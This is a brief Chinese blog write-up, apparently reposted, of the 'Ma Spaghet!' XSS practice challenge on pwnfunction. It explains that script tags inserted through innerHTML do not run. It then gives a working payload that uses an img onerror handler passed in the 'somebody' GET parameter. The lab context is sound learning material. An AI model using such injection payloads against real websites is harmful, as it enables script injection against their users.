当前位置:   article > 正文

xss.pwnfunction-Ma Spaghet!

xss.pwnfunction-Ma Spaghet!

根据代码得知


这个是根据get传参的并且是由someboby来接收参数的

所以

<script>alert(1137)</script>

js并没有执行因为 HTML5中指定不执行由innerHTML插入的<script>标签

所以

?somebody=<img%20src=1%20onerror="alert(1337)">

这样就成功了 

本文内容由网友自发贡献,转载请注明出处:https://www.wpsshop.cn/w/很楠不爱3/article/detail/387963
推荐阅读
相关标签
  

闽ICP备14008679号